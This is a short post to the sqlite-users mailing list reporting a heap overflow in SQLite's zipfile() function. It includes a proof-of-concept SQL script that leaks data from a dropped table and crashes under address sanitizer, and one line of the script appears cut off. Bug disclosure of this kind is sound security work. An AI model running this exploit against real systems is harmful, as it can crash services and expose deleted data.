
We found a heap overflow bug in sqlite, which leads to crashing and memory 
Here is the PoC:
create table v0(v1 char);
insert into v0 values ('1');
create table v2(v3 text);
insert into v2 values 
drop table v2;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
select hex(v1) from v0;
From the hex result we can spot the data in the deleted table v2. And if we run 
it with address sanitizer, we get a heap overflow crash.

The bug exists in the update to date release code and the development code.

Yongheng & Rui
sqlite-users mailing list

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